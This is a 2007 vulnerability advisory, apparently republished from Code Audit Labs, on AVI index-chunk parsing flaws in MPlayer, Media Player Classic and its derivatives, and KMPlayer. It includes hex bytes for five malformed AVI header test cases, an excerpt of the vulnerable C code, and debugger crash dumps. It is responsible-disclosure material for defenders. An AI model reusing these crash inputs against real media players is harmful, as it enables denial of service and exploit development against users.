CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities

2007-09-13T00:00:00
ID SECURITYVULNS:DOC:17994
Type securityvulns
Reporter Securityvulns
Modified 2007-09-13T00:00:00

Description

CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities

Code Audit Labs (http://www.vulnhunt.com) Code Audit for some popular media player and discovered some vulnerabilities.

one heap overflow was discovered in MPlayer. one heap overflow and one integer overflow were discovered in media player classic(mpc) and other produces base on mpc like mympc and StormPlayer). Some D.o.S (raise 100% cpu ) were discovred in KMPlayer.

By tricking a user into opening a specially crafted media file, an attacker who exploit heap overflow in MPlayer or media player classic could potential execute arbitrary code with the user's privileges.

Original LINK:

http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produce_handling_AVI_file_vulnerabilities.txt

Affected Product

1 MPlayer 1.0rc1 and prior (we tested version 20070729) 2 media player classic v6.4.9.0 and prior; and other produces base on it. ( mympc 1.0.0.1 and StormPlayer 1.0.4) 3 KMPlayer v2.9.3.1210 and prior

Technical Description

those vulnerabilities are discoered via playing with AVI 1) indx truck size 2) wLongsPerEntry 3) nEntriesInuse

Olny build 5 testcases

test case 1 (new_avihead_poc1.avi)

69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020

test case 2 (new_avihead_poc2.avi)

69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00 wLongsPerEntry 0xffff BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0xFFFFFFFF

test case 3 (new_avihead_poc3.avi)

69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020

test case 4 (new_avihead_poc4.avi)

69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10

indx truck size 0x0000ff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020

test case 5 (new_avihead_poc5.avi)

69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40

indx truck size 0x0000ff00 wLongsPerEntry 0x0004 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x40000010

TEST RESULT +---------+-----------+-----------+-----------+-----------+----------+ | produce | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 | +---------+-----------+-----------+-----------+-----------+----------+ | wmp | ok | ok | ok | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mplayer | ok | ok | HO/CRASH | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mpc | HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ |KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mympc | HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ |StormPlay| HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | xplayer | ok | ok | ok | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+

LITTLE ANALYSIS

MPlayer svn 20070729 (last version)

1:new_mplayer_avihead_poc3.avi null pointer in winxp or glibc 2.5(depend on compile option). if glibc <2.5(maybe prior) or win2000 sp4 ,it will be heap overflow.

vulnerability code in libmpdemux/aviheader.c:

 232       print_avisuperindex_chunk&#40;s,MSGL_V&#41;;
 233
 234       if&#40; &#40;&#40;chunksize/4&#41;/s-&gt;wLongsPerEntry&#41; &lt; s-&gt;nEntriesInUse&#41;{
 235         mp_msg &#40;MSGT_HEADER, MSGL_WARN, &quot;Broken super index

chunk\n"); 236 s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry; 237 } 238 239 // Check and fix this useless crap 240 if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) { 241 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk size: %u\n",s->wLongsPerEntry); 242 s->wLongsPerEntry = sizeof(avisuperindex_entry)/4; 243 } 244 s->aIndex = calloc(s->nEntriesInUse, sizeof (avisuperindex_entry)); 245 s->stdidx = calloc(s->nEntriesInUse, sizeof (avistdindex_chunk)); 246 247 // now the real index of indices 248 for (i=0; i<s->nEntriesInUse; i++) { 249 chunksize-=16;

 that&#39;s funny, the above code still can be bypassed because of

incorrect check order.

 and example code
 calloc&#40;0x10000001, 0x10&#41;;

 it will return NULL in winxp or gligc 2.5
 it will return 0x10 sizes heap in glibc &lt;2.5&#40;maybe prior&#41; or

win2000 sp4

0:000> g (54c.284): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00 edi=ffffff00 eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0 nv up ei ng nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00200286 gmplayer+0x13b084: 0053b084 89741500 mov [ebp+edx],esi ss:0023:01420000=02cc1b9e 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084

media player classic v6.4.9.0 (last version)

there are many produces base on media player classic. all of produces are affected.

1:new_avihead_poc1.avi heap overflow

(270.198): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c edi=060ff000 eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\xx\mpc2kxp6490\mplayerc.exe mplayerc+0x2b8a4a: 006b8a4a f3a5 rep movsd ds:060fa86c=73640001 es:060ff000=???????? 0:003> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a 00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6

2: new_avihead_poc2.avi new_avihead_poc3.avi

VERIFIER STOP 00000004: pid 0x870: extreme size request

    029B0000 : Heap handle
    FFFFFF08 : Size requested
    00000000 :
    00000000 :

(870.a88): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004 edi=029b0000 eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!DbgBreakPoint: 7c921230 cc int 3

in a word, assume indx truck size is indx_truck_size, the code like: buf =malloc(indx_truck_size+8) it will trigger integer overflow.

KMPlayer v2.9.3.1210 (last version)

1:new_avihead_poc1.avi D.o.S 2:new_avihead_poc2.avi D.o.S 3:new_avihead_poc3.avi D.o.S

DISCLOSURE TIMELINE:

1: 2007-07-30 notice MPlayer vendor 2: 2007-07-31 the vendor reply 3: 2007-09-12 release this report

About Us:

Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com

EOF

-- Code Audit Labs http://www.vulnhunt.com/